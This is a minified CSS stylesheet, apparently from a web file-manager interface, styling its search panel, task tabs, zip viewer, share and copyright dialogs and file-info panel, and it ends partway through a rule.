.s_br{margin-bottom:8px;line-height:25px;}.do-search-box .search-header #search-value,.do-search-box .search-header #search-path,.do-search-box .search-header #search-ext{height:23px;height:27px \0;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;width:125px;padding-left:10px;padding-right:10px;margin-left:5px;}.do-search-box .search-header #search-value:focus,.do-search-box .search-header #search-path:focus,.do-search-box .search-header #search-ext:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 4px #75A1F0;}.do-search-box .search-header #search-value{width:190px;margin:0;padding:2px 5px 0px 5px;padding-top:1px \0;}.do-search-box #search-is-case{margin-left:10px;}.do-search-box .search-desc{height:30px;line-height:30px;text-align:center;font-size:13px;margin:0px 10px;border:1px solid #ddd;color:#3196e6;background-image:-webkit-linear-gradient(top,#fff,#def);border-top-left-radius:3px;border-top-right-radius:3px;}.do-search-box .search-result{overflow-y:auto;overflow-x:hidden;position:absolute;top:137px;bottom:0px;right:0px;left:0px;margin:10px;border:1px solid #ddd;border-top:none;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-items{list-style:none;margin:0px;padding:10px 0;font-size:13px;}.do-search-box .search-result .file-item .file-info{height:25px;line-height:25px;cursor:default;padding-left:10px;font-size:13px;color:#444;position:relative;word-wrap:break-word;word-break:break-all;overflow:hidden;}.do-search-box .search-result .file-item .file-info:hover{background:#eee;}.do-search-box .search-result .file-item .file-info .title{height:25px;color:#666;padding-left:5px;}.do-search-box .search-result .file-item .file-info .title:hover{border-bottom:1px solid #1387bb;cursor:pointer;color:#1387bb;}.do-search-box .search-result .file-item .file-info .switch{width:20px;height:20px;display:inline-block;text-align:center;color:#aaa;font-size:14px;}.do-search-box .search-result .file-item .file-info .file-icon{display:inline-block;width:18px;height:18px;}.do-search-box .search-result .file-item .file-info .file-icon img{width:100%;height:100%;}.do-search-box .search-result .file-item .file-info .result-num{margin:0 5px;border-radius:10px;background-color:#dfeaf3;color:#666;font-size:12px;padding:3px 8px;font-weight:bold;}.do-search-box .search-result .file-item .file-info .goto{position:absolute;right:0;top:0;width:30px;height:25px;line-height:25px;text-align:center;color:#bbb;background:#fff;cursor:pointer;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.do-search-box .search-result .file-item .file-info .goto:hover,.do-search-box .search-result .file-item .file-info:hover .goto:hover{background:#fbbc00;color:#fff;}.do-search-box .search-result .file-item .file-info:hover .goto{display:block;background:#e6e6e6;}.do-search-box .search-result .file-item .keyword{background:#ffef65;color:#000;}.do-search-box .search-result .file-item .result-item{list-style:none;margin:0px;padding:0px;}.do-search-box .search-result .file-item .result-item .result-info{height:25px;margin:0px;padding:0;line-height:25px;padding:0 15px;cursor:default;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;}.do-search-box .search-result .file-item .result-item .result-info:hover{background:#eee;}.do-search-box .search-result .file-item .result-item .result-info.this,.do-search-box .search-result .file-item .result-item .result-info.this:hover{background:#63acff;}.do-search-box .search-result .file-item .result-item .result-info.this .line,.do-search-box .search-result .file-item .result-item .result-info.this .search-info,.do-search-box .search-result .file-item .result-item .result-info.this:hover .line,.do-search-box .search-result .file-item .result-item .result-info.this:hover .search-info{color:#fff;}.do-search-box .search-result .file-item .result-item .line{display:inline-block;width:32px;margin-left:7px;padding-right:4px;text-align:right;font-weight:800;color:#aaa;}.do-search-box .search-result .file-item .result-item .search-info{font-family:Menlo, Consolas, source-code-pro, Monaco, 'Liberation Mono', 'Ubuntu Mono', Courier, 'Helvetica Neue', 'Microsoft Yahei', '微软雅黑', 'Lantinghei SC', STXihei, WenQuanYi, sans-serif;color:#444;}.do-search-box .search-result .file-item.open .file-info .switch .icon-caret-right:before{content:"\f0d7";}#maskViewContent .upload-tips{text-align:center;}#maskViewContent .upload-tips .icon-cloud{opacity:0.8;}#maskViewContent .upload-tips .icon-cloud.cloud2{font-size:180px;}#maskViewContent .upload-tips .icon-cloud.cloud1,#maskViewContent .upload-tips .icon-cloud.cloud3{position:absolute;opacity:0.6;}#maskViewContent .upload-tips .icon-cloud.cloud1{margin-left:-60px;margin-top:110px;-webkit-animation:moveLeftLoop 8.0s infinite ease-in-out;animation:moveLeftLoop 8.0s infinite ease-in-out;}#maskViewContent .upload-tips .icon-cloud.cloud3{margin-left:-50px;margin-top:60px;font-size:60px;animation-delay:4s;-webkit-animation-delay:4s;-webkit-animation:moveLeftLoop 10.0s infinite ease-in-out;animation:moveLeftLoop 10.0s infinite ease-in-out;}#maskViewContent .upload-tips .cloud-moveup{height:70px;}#maskViewContent .upload-tips .cloud-moveup i{position:absolute;margin-left:-23px;margin-top:-16px;}.task-tab{position:fixed;bottom:1px;left:0;width:100%;height:30px;padding-left:50px;z-index:100;background:rgba(0,0,0,0.1);border-top:1px solid rgba(0,0,0,0.15);color:#444;}.task-tab .tabs{height:100%;margin-right:20px;margin-right:60px;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;}.task-tab .tabs .tab{float:left;height:29px;margin-right:2px;white-space:nowrap;text-overflow:ellipsis;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;color:#fff;border-radius:3px;cursor:default;overflow:hidden;font-size:1em;box-shadow:0 0 6px #666;padding-left:4px;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.3)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.3),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.3),rgba(255,255,255,0));-khtml-user-select:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;-o-user-select:none;user-select:none;}.task-tab .tabs .tab.hover{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.5)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.5),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.5),rgba(255,255,255,0));}.task-tab .tabs .tab.this{filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.7)', endColorstr='rgba(255,255,255,0)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-o-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));background-image:linear-gradient(top,rgba(255,255,255,0.7),rgba(255,255,255,0));-pie-background:linear-gradient(to top,rgba(255,255,255,0.7),rgba(255,255,255,0));box-shadow:0 0 6px #000;}.tasktab-dragging{position:fixed;position:absolute;z-index:99999;height:30px;width:110px;border:1px solid rgba(255,255,255,0.4);line-height:30px;text-shadow:0 0 3px #000;box-shadow:0 0 6px #000;padding-left:4px;white-space:nowrap;text-overflow:ellipsis;border-radius:3px;cursor:default;color:#fff;overflow:hidden;font-size:1em;word-break:break-all;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(255,255,255,0.8)', endColorstr='rgba(255,255,255,0.2)');background-image:-webkit-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-moz-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-o-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:-ms-linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));background-image:linear-gradient(top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));-pie-background:linear-gradient(to top,rgba(255,255,255,0.8),rgba(255,255,255,0.2));}.init-loading{position:fixed;left:50%;margin-left:-80px;top:40%;font-size:1.25em;z-index:999999;width:auto;}.init-loading div{padding:20px;background:#000;opacity:0.6;filter:alpha(opacity=60);margin:0 auto;color:#FFF;border-radius:6px;text-align:center;line-height:30px;}.init-loading img{border-radius:10px;}.space-info-bar{width:110px;}.space-info-bar .space-process{width:110px;height:6px;overflow:hidden;background-color:#ddd;margin:0px;border-radius:5px;}.space-info-bar .space-process .space-process-use{width:20%;-webkit-transition:all 0.2s;-moz-transition:all 0.2s;-o-transition:all 0.2s;-ms-transition:all 0.2s;transition:all 0.2s;height:100%;background-color:#428bca;border-radius:5px;}.space-info-bar .space-process .space-process-use.warning{background-color:#f00 !important;}.dialog-app-select .app-list{border:1px solid #ddd;padding:25px 0 0 10px;height:280px;overflow:auto;overflow-x:hidden;border-radius:4px;background:#f5f5f5;}.dialog-app-select .app-list .app-item{border:1px solid #f5f5f5;width:95px;height:110px;border-radius:4px;transition:all 0.2s ease 0s;margin:0 10px 10px 0;text-align:center;float:left;color:#444;text-decoration:none;}.dialog-app-select .app-list .app-item:hover{border-color:#77c2ff;background:#def;}.dialog-app-select .app-list .app-item.select{border-color:#559cec;background:#63acff;color:#fff;}.dialog-app-select .app-list .app-item .ico{width:64px;height:64px;display:table-cell;vertical-align:middle;padding:5px 0 0 16px;}.dialog-app-select .app-list .app-item .ico img{width:100%;height:auto;}.dialog-app-select .app-list .app-item .ico .x-item-file{display:block;}.dialog-app-select .app-list .app-item .ico [class^="icon-"].font-icon,.dialog-app-select .app-list .app-item .ico [class*="icon-"].font-icon{width:56px;height:56px;line-height:60px;font-size:28px;padding:0px;text-align:center;margin-top:-2px;border-radius:12px;filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='rgba(3,169,244,0.7)', endColorstr='rgba(63,81,181,0.5)');background-image:-webkit-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-moz-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-o-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:-ms-linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));background-image:linear-gradient(164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));-pie-background:linear-gradient(to 164deg,rgba(3,169,244,0.7),rgba(63,81,181,0.5));color:#fff;display:inline-block;}.appbox{overflow:hidden;padding:0px 10px 0 0;}.appbox .appline{width:100%;margin-bottom:10px;line-height:20px;overflow:hidden;}.appbox .appline .left{float:left;width:80px;text-align:right;padding-right:14px;}.appbox .appline .right{float:left;}.appbox .appline input{margin-right:5px;}.appbox .appline label{display:inline-block;margin-left:-10px;padding:0 5px;}.appbox .appline input[type=text],.appbox .appline textarea{width:275px;padding:0px 5px;border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:28px;border-radius:3px;}.appbox .appline input[type=text]:focus,.appbox .appline textarea:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.appbox .appline input[type=text].w30{width:50px;}.appbox .appline input[type=text].w20{width:30px;}.appbox .appline textarea{height:100px;}.appbox .appline.icon input{width:232px;}.appbox .appline.icon a{padding:2px 4px;top:0px;border:1px solid #CCC;}.appbox .appline.icon .open{margin-left:-12px;cursor:pointer;margin-top:-4px;font-size:14px;padding:3px 1em 4px 1em;}.appbox .appline.icon a img{width:20px;height:20px;}.zip-view-dialog .aui-content{min-width:400px;position:relative;}.zip-view-dialog .aui-title{height:90px;}.zip-view-dialog .zip-view-content{position:absolute;left:0;right:0;bottom:0;top:0px;margin:0px;min-width:400px;border:none;}.zip-view-dialog .zip-view-content .header{height:90px;background-color:#2c41b3;background-image:linear-gradient(to bottom,#2c41b3 0,#222b5d 100%);color:#fff;position:relative;}.zip-view-dialog .zip-view-content .header .bg{background:url("../../../images/common/banner/fly.png") 100px -300px;width:100%;height:100%;position:absolute;}.zip-view-dialog .zip-view-content .header .icon{width:56px;height:56px;position:absolute;left:20px;top:20px;}.zip-view-dialog .zip-view-content .header .name,.zip-view-dialog .zip-view-content .header .desc{position:absolute;overflow:hidden;white-space:nowrap;text-overflow:ellipsis;width:80%;}.zip-view-dialog .zip-view-content .header .name{margin:22px 0 0 90px;font-size:18px;font-weight:800;}.zip-view-dialog .zip-view-content .header .desc{margin:50px 0 0 90px;}.zip-view-dialog .zip-view-content .zip-header-title{height:23px;line-height:23px;border-bottom:1px solid #ddd;border-top:1px solid #ddd;background:#f6f6f6 url("../../../images/common/bg.gif") 0 -30px;}.zip-view-dialog .zip-view-content .zip-header-title .item{float:left;}.zip-view-dialog .zip-view-content .zip-header-title .item span{display:block;border-right:1px solid #ddd;padding-left:10px;cursor:default;}.zip-view-dialog .zip-view-content .zip-header-title .name{width:60%;}.zip-view-dialog .zip-view-content .zip-header-title .size{width:10%;}.zip-view-dialog .zip-view-content .zip-header-title .mtime{width:30%;}.zip-view-dialog .zip-view-content .zip-header-title .item.mtime span{border-right:none;}.zip-view-dialog .zip-view-content .ztree{padding:0px;position:absolute;top:115px;left:0;right:0px;bottom:0;overflow:auto;}.zip-view-dialog .zip-view-content .ztree li,.zip-view-dialog .zip-view-content .ztree li ul{width:100%;}.zip-view-dialog .zip-view-content .ztree li a{position:relative;padding-left:0;color:#333;text-shadow:none;}.zip-view-dialog .zip-view-content .ztree li a:hover{transition:none;}.zip-view-dialog .zip-view-content .ztree li a.odd{background:#f1f7ff;}.zip-view-dialog .zip-view-content .ztree li a:hover,.zip-view-dialog .zip-view-content .ztree li a.odd:hover{background:#fdeec3;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode,.zip-view-dialog .zip-view-content .ztree li a.odd.curSelectedNode{background:#63acff;color:#fff;}.zip-view-dialog .zip-view-content .ztree li a .name{width:45%;overflow:hidden;position:absolute;word-break:break-all;text-overflow:ellipsis;}.zip-view-dialog .zip-view-content .ztree li a .time{width:27%;opacity:0.8;font-size:12px;position:absolute;left:72%;}.zip-view-dialog .zip-view-content .ztree li a .size{width:10%;opacity:0.8;font-size:12px;position:absolute;left:62%;}.zip-view-dialog .zip-view-content .ztree li a .menu-item-parent{display:none;position:absolute;right:0px;top:0;text-align:center;width:25px;height:24px;background:#fff;background:rgba(50,50,50,0.1);color:#666;}.zip-view-dialog .zip-view-content .ztree li a:hover .menu-item-parent{display:block;}.zip-view-dialog .zip-view-content .ztree li a.curSelectedNode .menu-item-parent{display:block;color:#fff;}.support-space-not .share-dialog .content-box .content-info{padding:30px 20px 30px 20px;}.support-space-not .system-content .right-frame .group-title .group-size{display:none !important;}.support-space-not .size-max-set,.support-space-not .user-setting-more-btn,.support-space-not .user-setting-more{display:none;}.support-space-not .user-list .space,.support-space-not .share-view-info,.support-space-not .user-space-info{display:none;}.support-space-not .frame-main .user-space-info{display:none;}.support-space-not .frame-main .frame-left .group-space-use{display:none;}.support-space-not .frame-main .frame-left #folder-list-tree{bottom:70px;}.dropdown-menu.menu-topbar-user{right:6px;}.version-vip{height:26px;line-height:26px;padding:0;opacity:0.7;filter:alpha(opacity=70);padding-left:25px;cursor:pointer;font-size:12px;display:block;color:#eee;background:#999;}.version-vip#version_vip_1{color:#bdeaff;background:#03a9f4;}.version-vip#version_vip_2{color:#ea9df7;background:#9c27b0;}.version-vip#version_vip_3,.version-vip#version_vip_4,.version-vip#version_vip_5,.version-vip#version_vip_6{color:#fff;background:#ffc107;}.version-vip:hover{opacity:0.9;filter:alpha(opacity=90);text-decoration:none;}.version-license{width:250px;height:250px;overflow:hidden;position:absolute;z-index:9999;pointer-events:none;top:30px;left:0px;}.version-license a.line{position:absolute;pointer-events:all;width:300px;height:60px;line-height:60px;left:-70px;top:40px;font-size:20px;background:#4CAF50;text-decoration:none;-webkit-transform:rotate(-45deg);-moz-transform:rotate(-45deg);transform:rotate(-45deg);-webkit-transition:all 0.2;-moz-transition:all 0.2;-o-transition:all 0.2;-ms-transition:all 0.2;transition:all 0.2;text-align:center;color:#fff;opacity:0.9;filter:alpha(opacity=90);}.version-license a.line:hover{opacity:0.7;filter:alpha(opacity=70);}.path-select-input{width:550px;padding:7px;background:rgba(255,255,255,0.3);border:1px solid rgba(100,100,100,0.3);color:#000;}.aui-state-lock .aui-min{display:none;}.dialog-copyright{width:400px !important;}.dialog-copyright,.share-dialog,.check-version-dialog{min-width:400px;}.dialog-copyright.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer{overflow:inherit;box-shadow:0 0px 60px rgba(0,0,0,0.4);border-radius:5px;border:none;}.dialog-copyright.dialog-simple .aui-outer,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in,.share-dialog.dialog-simple .aui-outer,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in,.check-version-dialog.dialog-simple .aui-outer,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-main,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.share-dialog.dialog-simple .aui-outer .aui-main,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main,.check-version-dialog.dialog-simple .aui-outer .aui-main,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-main{border:none;}.dialog-copyright.dialog-simple .aui-outer .aui-header,.dialog-copyright.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.share-dialog.dialog-simple .aui-outer .aui-header,.share-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header,.check-version-dialog.dialog-simple .aui-outer .aui-header,.check-version-dialog.dialog-simple .aui-outer.dialog-mouse-in .aui-header{border:none;}.dialog-copyright.dialog-simple .aui-header,.share-dialog.dialog-simple .aui-header,.check-version-dialog.dialog-simple .aui-header{background:transparent;opacity:1.0;filter:alpha(opacity=100);border:none;}.dialog-copyright.dialog-simple .aui-nw,.dialog-copyright.dialog-simple .aui-n,.dialog-copyright.dialog-simple .aui-ne,.dialog-copyright.dialog-simple .aui-w,.dialog-copyright.dialog-simple .aui-e,.dialog-copyright.dialog-simple .aui-sw,.dialog-copyright.dialog-simple .aui-s,.dialog-copyright.dialog-simple .aui-se,.share-dialog.dialog-simple .aui-nw,.share-dialog.dialog-simple .aui-n,.share-dialog.dialog-simple .aui-ne,.share-dialog.dialog-simple .aui-w,.share-dialog.dialog-simple .aui-e,.share-dialog.dialog-simple .aui-sw,.share-dialog.dialog-simple .aui-s,.share-dialog.dialog-simple .aui-se,.check-version-dialog.dialog-simple .aui-nw,.check-version-dialog.dialog-simple .aui-n,.check-version-dialog.dialog-simple .aui-ne,.check-version-dialog.dialog-simple .aui-w,.check-version-dialog.dialog-simple .aui-e,.check-version-dialog.dialog-simple .aui-sw,.check-version-dialog.dialog-simple .aui-s,.check-version-dialog.dialog-simple .aui-se{height:0px;width:0px;background:none;}.dialog-copyright.dialog-simple .aui-inner,.share-dialog.dialog-simple .aui-inner,.check-version-dialog.dialog-simple .aui-inner{border:none;background:none;}.dialog-copyright.dialog-simple .aui-title,.share-dialog.dialog-simple .aui-title,.check-version-dialog.dialog-simple .aui-title{opacity:0.01;filter:alpha(opacity=1);top:0px;position:absolute;width:100%;height:100%;z-index:5;}.dialog-copyright.dialog-simple .aui-min,.dialog-copyright.dialog-simple .aui-max,.share-dialog.dialog-simple .aui-min,.share-dialog.dialog-simple .aui-max,.check-version-dialog.dialog-simple .aui-min,.check-version-dialog.dialog-simple .aui-max{display:none;}.dialog-copyright.dialog-simple .aui-title-bar,.share-dialog.dialog-simple .aui-title-bar,.check-version-dialog.dialog-simple .aui-title-bar{bottom:0px;overflow:hidden;height:100px;position:absolute;margin-top:-120px;top:120px;margin-left:0px;border-radius:4px;}.dialog-copyright.dialog-simple .aui-close,.share-dialog.dialog-simple .aui-close,.check-version-dialog.dialog-simple .aui-close{opacity:0.6;filter:alpha(opacity=60);background:rgba(0,0,0,0.5);width:100px;height:100px;top:-50px;right:-50px;border-radius:50px;text-align:left;font-size:20px;z-index:100;padding:0;}.dialog-copyright.dialog-simple .aui-close:hover,.share-dialog.dialog-simple .aui-close:hover,.check-version-dialog.dialog-simple .aui-close:hover{opacity:0.6;filter:alpha(opacity=60);}.dialog-copyright.dialog-simple .aui-close:active,.share-dialog.dialog-simple .aui-close:active,.check-version-dialog.dialog-simple .aui-close:active{opacity:1.0;filter:alpha(opacity=100);}.dialog-copyright.dialog-simple .aui-close::before,.share-dialog.dialog-simple .aui-close::before,.check-version-dialog.dialog-simple .aui-close::before{padding-left:22px;line-height:140px;}.dialog-copyright .aui-footer,.share-dialog .aui-footer,.check-version-dialog .aui-footer{display:none;}.check-version-dialog .update-box{margin-top:0px;}.share-dialog .content-box .content-info .input-line .open-window,.pathinfo .input-group-btn .open-window{margin-right:-1px;border-radius:0px;}.dialog-copyright .dialog-copyright-content,.check-version-dialog .aui-content{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;width:auto;border-radius:6px;width:400px;-webkit-box-shadow:0px 10px 60px rgba(0,0,0,0.4);-moz-box-shadow:0px 10px 60px rgba(0,0,0,0.4);box-shadow:0px 10px 60px rgba(0,0,0,0.4);border:1px solid #ccc \9;padding-bottom:30px;background:#fff;background:rgba(255,255,255,0.9);}.dialog-copyright .dialog-copyright-content .title,.check-version-dialog .aui-content .title{width:100%;background:#6699cc url("../../../images/common/login.png");height:150px;padding-top:0px;border-top-left-radius:5px;border-top-right-radius:5px;}.dialog-copyright .dialog-copyright-content .title .logo,.check-version-dialog .aui-content .title .logo{text-align:center;font-size:35px;width:100%;padding-top:40px;color:#aaddff;-webkit-box-reflect:below -13px -webkit-gradient(linear,left top,left bottom,from(transparent),to(rgba(255,255,255,0.2)));background-image:-webkit-linear-gradient(92deg,#FFFFFF,#14A1FF);-webkit-background-clip:text;-webkit-text-fill-color:transparent;-webkit-animation:hue 6s 100 linear;}.dialog-copyright .dialog-copyright-content .title .logo i,.check-version-dialog .aui-content .title .logo i{color:#aaddff;font-weight:400;margin-right:10px;}.dialog-copyright .dialog-copyright-content .title .info,.check-version-dialog .aui-content .title .info{text-align:right;font-size:1.15em;color:#aaddff;padding-right:14px;padding-top:30px;}.dialog-copyright .dialog-copyright-content .content,.check-version-dialog .aui-content .content{padding:20px;}.dialog-copyright .dialog-copyright-content .content p,.check-version-dialog .aui-content .content p{text-indent:2em;color:#333;margin-bottom:30px;}.dialog-copyright .dialog-copyright-content .content a,.check-version-dialog .aui-content .content a{padding-right:5px;}.dialog-copyright .dialog-copyright-content .content div,.check-version-dialog .aui-content .content div{text-align:center;padding-bottom:5px;}.check-version-dialog.dialog-simple .aui-title-bar{margin-top:-120px;}.share-dialog .content-box{-webkit-box-shadow:0 5px 30px rgba(0,0,0,0.5);-moz-box-shadow:0 5px 30px rgba(0,0,0,0.5);box-shadow:0 5px 30px rgba(0,0,0,0.5);border-radius:5px;background:#fff;border:1px solid #ccc \9;width:auto;}.share-dialog .content-box .title{width:100%;color:#fff;height:100px;border-radius:5px 5px 0 0;background:#6699cc url('../../../images/common/login.png');}.share-dialog .content-box .titleinfo{text-align:center;font-size:35px;height:60px;overflow:hidden;line-height:80px;}.share-dialog .content-box .titleinfo i{color:#dff;font-size:30px;padding-right:10px;}.share-dialog .content-box .share-view-info{width:200px;margin:0 auto;margin-top:0px;padding:1px 5px;text-align:center;border-radius:17px;background:#117eaf;background:rgba(0,0,0,0.2);opacity:0.8;filter:alpha(opacity=80);}.share-dialog .content-box .content-info{padding:10px;padding-left:20px;}.share-dialog .content-box .content-info .input-line{margin:6px 0 8px 0;position:relative;}.share-dialog .content-box .content-info .input-line .input-title{display:block;width:80px;padding-top:4px;float:left;height:30px;padding-right:10px;text-align:right;}.share-dialog .content-box .content-info .input-line input[type="text"]{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;height:32px;line-height:30px;padding:0px 5px;width:150px;margin-right:10px;float:left;border-radius:3px;}.share-dialog .content-box .content-info .input-line input[type="text"]:focus{border-color:#75A1F0;outline:none;box-shadow:0 0 0 3px rgba(117,161,240,0.3);}.share-dialog .content-box .content-info .input-line label{margin-top:8px;margin-right:10px;}.share-dialog .content-box .content-info .input-line label input{margin:0 5px 5px 0;}.share-dialog .content-box .content-info .input-line .desc{font-size:1em;color:#bbb;font-style:normal;padding-left:0px;}.share-dialog .content-box .content-info .input-line .share-name{width:215px;margin-right:10px;}.share-dialog .content-box .content-info .input-line .share-url{margin-right:0;border-radius:3px 0 0 3px;width:167px !important;height:33px;}.share-dialog .content-box .content-info .input-line .share-more{line-height:33px;}.share-dialog .content-box .content-info .input-line .input-group-btn{float:left;}.share-dialog .content-box .content-info .input-line .dropdown-toggle{margin-left:-5px;border-radius:0 3px 3px 0;}.share-dialog .content-box .content-info .input-line .open-window{margin-left:-12px;}.share-dialog .content-box .content-info .input-line .share-copy{width:60px;border-radius:0px;margin-left:-7px;}.share-dialog .content-box .content-info .input-line.select-path input[type="text"]{width:155px;}.share-dialog .content-box .content-info .input-line.select-path a.select-btn{margin-left:-14px;padding:5px 8px 5px;font-size:15px;border-top-left-radius:0px;border-bottom-left-radius:0px;}.share-dialog .content-box .content-info .share-others{margin:-8px 0 -8px 0;}.share-dialog .content-box .share-action{border-top:1px solid #eee;background:#f8f8f8;height:60px;border-radius:0 0 4px 4px;}.share-dialog .content-box .share-action button{float:right;margin:10px 20px 10px 0px;outline:0;}.share-dialog .content-box .share-action .share-remove-button,.share-dialog .content-box .share-action .remove-button{float:right;margin-top:18px;color:#888;margin-right:20px;font-size:14px;}.share-dialog .content-box .share-action .share-remove-button:hover,.share-dialog .content-box .share-action .remove-button:hover{color:#f30;}.file-list-icon .file{position:relative;}.file-list-icon .file .download{position:absolute;bottom:4px;margin-left:45px;opacity:0.5;filter:alpha(opacity=50);}.file-list-icon .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:30px;line-height:30px;width:30px;color:#aaa;}.file-list-list .file{position:relative;}.file-list-list .file .download{position:absolute;bottom:-2px;margin-left:45px;left:180px;z-index:99;opacity:0.5;filter:alpha(opacity=50);}.file-list-list .file .download .btn{font-size:1.25em;padding:0;display:block;border-radius:18px;height:28px;line-height:28px;width:28px;color:#aaa;}.pathSelectApi .aui-footer .aui-buttons{padding:15px;}.pathSelectApi .aui-footer .label{position:absolute;right:175px;margin-top:6px;opacity:0.7;filter:alpha(opacity=70);}body div.file-continer .file.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-writeable{opacity:0.7;filter:alpha(opacity=70);color:#08c !important;}body div.file-continer .file.file-not-readable,body div.file-continer .file.file-not-readable.file-not-writeable,body .frame-main .frame-left .ztree li a.file-not-readable,body .frame-main .frame-left .ztree li a.file-not-readable.file-not-writeable{opacity:0.4;filter:alpha(opacity=40);color:#a00 !important;}.url-link input{border:1px solid #ddd;background:#fff;line-height:30px;height:30px;width:300px;margin-bottom:15px;padding:0 5px;}.aui-content .ajaxError{-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;color:#f60;position:absolute;left:0px;right:0px;bottom:0px;top:40px;overflow:auto;padding:10px;}.pathinfo{font-size:1em;width:350px;min-height:300px;padding:20px 0 10px 0;color:#446;}.pathinfo .line{width:95%;margin:8px auto 8px auto;height:0px;border-bottom:1px solid #eee;}.pathinfo .download-url{padding:0px 5px;width:140px;line-height:32px;height:32px;}.pathinfo .p{margin-bottom:2px;}.pathinfo .p .icon{width:40px;height:40px;float:left;border:1px solid #f6f6f6;margin-left:10px;}.pathinfo .p input.info-chmod{padding:0px 10px;width:55px;color:#999;margin-right:10px;display:inline-block;height:25px;line-height:25px;}.pathinfo .p .title{width:80px;float:left;color:#888;text-align:right;}.pathinfo .p .content{float:left;width:240px;word-break:break-all;color:#666;-khtml-user-select:text;-webkit-user-select:text;-moz-user-select:text;-ms-user-select:text;-o-user-select:text;user-select:text;font-size:1em;margin-left:15px;}.pathinfo .p .content.file-md5-loading{background:url("../../../images/common/loading.gif") 18px 5px no-repeat;}.pathinfo input{border:1px solid #ddd;background:#fff;outline:none;box-shadow:inset 0 1px 1px rgba(0,0,0,0.08);-webkit-transition:all ease-in-out .168s;-moz-transition:all ease-in-out .168s;-o-transition:all ease-in-out .168s;-ms-transition:all ease-in-out .168s;transition:all ease-in-out .168s;line-height:28px;padding:2px 5px;width:150px;float:left;height:28px;border-radius:3px;}.pathinfo 